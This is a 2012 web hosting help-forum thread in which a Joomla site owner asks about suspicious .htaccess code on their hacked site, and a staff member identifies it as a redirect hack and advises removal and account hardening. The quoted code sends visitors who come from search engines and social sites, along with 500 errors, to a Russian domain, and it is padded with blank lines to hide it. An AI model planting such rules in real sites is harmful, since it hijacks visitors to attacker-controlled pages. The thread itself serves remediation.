my joomla 1.5.26 website has been hacked

Asked by:
hismail / 18 Points
Time:
2012-08-12 12:36 pm EST
Category:
Joomla
Hits:
1,240
hi my website has been www.islamicmessages.co.za there is a code in the htaccess file that is not normal i tried deleting it but it keeps comming back i have a backup but i am not sure if it is malmare free below is the code


RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://2012register.ru/sensorika?7 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://2012register.ru/sensorika?7 [R=301,L]





























































ErrorDocument 500 http://2012register.ru/sensorika?7



















































To ask this user for more information, please first login.

To submit an answer, please login.

ANSWERS

0

ScottM
Staff
13,229 Points
2012-08-13 9:30 am EST
Hello hismail,

Yes, that is code that will redirect your visitors to another site when specific conditions are met. Htaccess hacks are the most common and also the easiest to take care of. Simply deleting the code will take care of it.

Since it is coming back, however, this means you have access problems with your account. You will want to follow some steps to harden your account from hacker access.

I have a checklist here to secure your account. As the domain you mentioned is not with our hosting, there may be a few differences in the details, but the concept is the same.

Best Regards,
Scott M

To submit a comment on this answer, please first login.

Want to share this Question?

Related Articles

It looks like there are no related articles.
Would you like to ask a question about this page? If so, click the button below!

Help Center Search

Current Customers

Email: support@WebHostingHub.com Ticket: Submit a Support Ticket
Call: 877-595-4HUB (4482)
757-416-6627 (Intl.)
Chat: Click To Chat Now

Ask the Community

Get help with your questions from our community of like-minded hosting users and Web Hosting Hub Staff.

Not a Customer?

Get web hosting from a company that is here to help.